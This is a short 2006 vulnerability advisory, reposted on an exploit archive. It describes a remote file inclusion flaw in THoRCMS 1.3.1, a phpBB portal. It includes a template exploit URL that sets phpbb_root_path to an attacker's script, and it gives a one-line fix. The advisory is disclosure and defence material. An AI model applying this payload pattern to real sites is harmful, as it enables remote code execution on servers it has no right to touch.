THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability

🗓️ 25 Jun 2006 00:00:00Reported by Kw3[R]LnType

zdt🔗 0day.today👁 35 Views

THoRCMS 1.3.1 Remote File Include Vulnerability, Dangerous level, phpBB porta

====================================================================
THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability
====================================================================




--------------------------------------------------------------------------- 
THoRCMS <= 1.3.1 ([phpbb_root_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : THoRCMS
version : latest version [ 1.3.1 ]
Description: A CMS/Portal for phpBB
URL : http://www.phpbbhacks.com/download/2349

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $phpbb_root_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script]


---------------------------------------------------------------------------

Solution :
~~~~~~~~~~

declare variabel $phpbb_root_path


-------------------------------- [ EOF] ----------------------------------



#  0day.today [2018-03-09]  #

25 Jun 2006 00:00Current

7.1High risk

Vulners AI Score7.1